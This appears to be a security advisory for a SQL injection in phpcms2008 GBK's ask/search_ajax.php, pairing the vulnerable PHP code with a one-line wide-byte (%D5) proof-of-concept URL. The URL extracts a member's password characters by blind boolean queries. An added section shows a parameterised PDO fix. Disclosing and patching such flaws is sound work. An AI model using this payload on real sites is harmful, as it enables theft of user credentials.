Author: 幻泉[B.S.N]
Affected software: phpcms2008 gbk
Vulnerable file: ask/search_ajax.php
Severity: High
Description:
/ask/search_ajax.php
Code:
if($q)
{
$where = " title LIKE '%$q%' AND status = 5"; // no filtering: $q is concatenated straight into $where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
/ask/include/answer.class.php
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where"); // tainted $where reaches the first query
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit"); // and the second one
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
Test method:
- /ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
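A hardened replacement for the query building shown above, added here as an example and not taken from phpcms: the search term and the LIMIT values are bound as parameters instead of interpolated. It assumes a PDO handle whose DSN carries the connection charset and which has emulated prepares switched off; the function name search_posts and the $table parameter are hypothetical.

```php
<?php
// Added example, not phpcms code. Assumes $pdo was created with the
// charset in the DSN (e.g. "mysql:host=localhost;dbname=phpcms;charset=gbk")
// and PDO::ATTR_EMULATE_PREPARES => false, so the server binds values
// itself instead of the client quoting them into the SQL text.
function search_posts(PDO $pdo, string $table, string $q,
                      int $page = 1, int $pagesize = 10): array
{
    $q = trim($q);
    if ($q === '') {
        return [];                       // mirrors the original exit('null')
    }
    // A table name cannot be a bound parameter: whitelist its characters
    // instead of interpolating it as-is.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('unsafe table name');
    }
    $page     = max($page, 1);
    $pagesize = max(1, min($pagesize, 50));
    $offset   = $pagesize * ($page - 1);

    // Escape LIKE metacharacters in the user's text so "%" or "_" cannot
    // widen the match, then bind the whole pattern as one value. This is
    // byte-based escaping; on a GBK database it only affects match
    // precision for rare characters, never safety, because the pattern is
    // bound rather than spliced into the statement.
    $pattern = '%' . addcslashes($q, '%_\\') . '%';

    $sql = "SELECT * FROM `$table` WHERE title LIKE :pattern AND status = 5"
         . " ORDER BY askid DESC LIMIT :offset, :pagesize";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':pattern',  $pattern,  PDO::PARAM_STR);
    $stmt->bindValue(':offset',   $offset,   PDO::PARAM_INT);
    $stmt->bindValue(':pagesize', $pagesize, PDO::PARAM_INT);
    $stmt->execute();

    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    foreach ($rows as $i => &$r) {        // keep the original orderid field
        $r['orderid'] = $i + 1;
    }
    unset($r);
    return $rows;
}
```

The %D5 byte in the PoC is why the GBK build is singled out: a client-side single-byte escape can be absorbed into one two-byte GBK character, leaving the quote live, so the fix relies on server-side binding with the correct connection charset rather than on addslashes-style escaping.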